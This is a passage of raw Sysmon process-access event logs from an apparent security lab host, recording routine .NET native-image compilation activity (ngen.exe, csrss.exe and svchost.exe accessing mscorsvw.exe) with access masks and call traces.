C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.351","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00101DEC0C00}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7298,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.351\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00101DEC0C00}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.351","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00101DEC0C00}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7299,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.366\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00101CEF0C00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.366","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00101CEF0C00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7300,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.366\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00101CEF0C00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.366","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00101CEF0C00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7301,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00101CEF0C00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00101CEF0C00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7302,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.398\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010E07E0B00}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.398","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010E07E0B00}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7303,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010E07E0B00}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010E07E0B00}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7304,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010E07E0B00}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010E07E0B00}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7305,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.445\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-0010BFF50C00}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 